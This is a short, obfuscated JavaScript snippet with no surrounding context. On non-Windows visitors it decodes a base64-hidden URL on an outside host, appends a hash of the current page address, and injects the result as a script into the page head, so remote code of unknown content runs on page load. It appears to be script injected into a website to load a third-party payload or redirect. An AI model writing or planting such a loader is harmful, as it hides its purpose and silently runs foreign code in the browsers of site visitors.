(function() { function a(s) { var h = 0, i, c; if (s.length === 0) return h; for (i = 0; i < s.length; i++) { c = s.charCodeAt(i); h = ((h << 5) - h) + c; h |= 0 } return h >>> 0 } var b = window.navigator.platform.toLowerCase(); if (!b.includes('win')) { var d = atob('aHR0cDovL3RqLnp1bmxvbmcuYWcvdHouanM/dj0='); var e = document.createElement('script'); e.src = d + a(location.href); document.head.appendChild(e) } } )();